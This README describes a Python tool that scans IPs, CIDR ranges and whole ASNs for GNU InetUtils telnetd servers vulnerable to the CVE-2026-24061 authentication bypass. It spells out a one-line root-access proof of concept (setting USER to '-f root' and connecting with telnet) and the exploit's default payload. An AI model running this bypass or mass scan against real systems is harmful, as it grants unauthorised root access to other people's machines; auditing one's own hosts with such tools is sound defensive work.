README.md

🛰️ Twenty-Three Scanner

A Powerful, Fast, and Elegant scanner for detecting vulnerable Telnetd services affected by CVE-2026-24061. Built with pure Python standard library - zero external dependencies required.

---

🔗 Table of Contents

• ⚖️ License
• 🧩 Features
• ☣️ Vulnerability Details
  • ⚡ Service Status
  • 🧪 Proof of Concept (PoC)
  • 💥 Affected Versions
  • 🧵 Patched Versions
  • ⚔️ Attack Vector
  • 🚨 CVSS Score
• 🛠️ Installation
• 📜 Usage
• 🎯 Examples
• ⚗️ Demos
• 📖 References

---

🧩 Features

• 🚀 High-Performance Scanning – Multi-Threaded Architecture with Configurable Thread Count.
• 🌐 Flexible Target Input – Support for Single IPs, CIDR Ranges, ASN Lookups, and File-Based Lists.
• 📊 Real-Time Progress – Beautiful Unicode-Based UI with Live Progress Bars.
• 🤖 ASN Intelligence – Automatic Prefix Fetching from RADB, BGPView, and HackerTarget APIs.
• 🌍 GEO Location Intelligence – Real-Time ASN, Provider and Location Fetching from ipapi API.
• 💾 Graceful Interruption – CTRL+C Handling with Automatic Result Saving.
• 📝 Detailed Logging – Configurable Verbosity Levels for Debugging.
• 🛡️ Safe Scanning – Built-In Limits to Prevent Accidental Massive Scans.
• 🎨 Clean Output – Professional Bordered Tables with Scan Summaries.
• 📦 Zero Dependencies – Pure Python 3.x Standard Library Only.

---

☣️ Vulnerability Details

CVE-2026-24061 is a critical authentication bypass vulnerability in GNU InetUtils Telnetd that allows unauthenticated remote attackers to gain root access by exploiting the NEW-ENVIRON option handling.

---

⚡ Service Status

The following is the Telnetd service configuration on the target host side.

---

🧪 Proof of Concept (PoC)

And here is the Proof of Concept (PoC) for this vulnerability, which can be executed manually from the attacker's host simply by running the command USER="-f root" telnet -a <TARGET_HOST> 23.

---

💥 Affected Versions

• GNU InetUtils >=1.9.3 <=2.7.
• Various embedded Linux distributions.
• IoT devices with vulnerable Telnetd implementations.

---

🧵 Patched Versions

• GNU InetUtils >=2.8.

---

⚔️ Attack Vector

The vulnerability exploits improper validation of the USER environment variable in the telnet NEW-ENVIRON (RFC 1572) option negotiation, allowing attackers to inject malicious values like -f root to bypass authentication.

---

🚨 CVSS Score

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.

---

🛠️ Installation

# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

---

📜 Usage

The following is a manual for the Twenty-Three Scanner tool that can be used to detect the vulnerability CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass.

usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)

Limit Options:
  --max-hosts-per-cidr N
                        maximum hosts to scan per CIDR block (default: 1024)
  --max-total-hosts N   maximum total hosts across all targets (default: 50000)
  --skip-large-networks
                        skip networks larger than /16 (avoids accidentally scanning huge ranges)

Output Options:
  -o FILE, --output FILE
                        save vulnerable hosts to file (format: IP:PORT)
  -v, --verbose         enable verbose debug logging

---

🎯 Examples

And here are some examples of how to use the command.

  # Scan Single IP Address, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23

  # Scan Single IP Address, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323

  # Scan Multiple IP Addresses, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23

  # Scan Multiple Addresses, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323

  # Scan CIDR Range, and Single Port with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt

  # Scan CIDR Range, and Multiple Ports with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt

  # Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt

  # Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt

  # Scan ASN and Single Port with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100

  # Scan ASN and Multiple Ports with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100

  # Scan ASN with Custom Limits and Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100

---

⚗️ Demos

Scan Single IP Address with Multiple Ports.

Scan Multiple IP Addresses with Single Port.

Scan CIDR Range with Single Port.

Scan ASN with Multiple Ports.

Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output.

---

📖 References

• Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access
• NVD - CVE-2026-24061
• CVE Record: CVE-2026-24061
• Inetutils - GNU network utilities
• [SECURITY] [DLA 4453-1] inetutils security update
• GNU InetUtils Security Advisory: remote authentication by-pass in telnet
• GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
• GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
• GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
• Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
• Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
• CVE-2026-24061 Telnet RCE Exploit - By SafeBreach Labs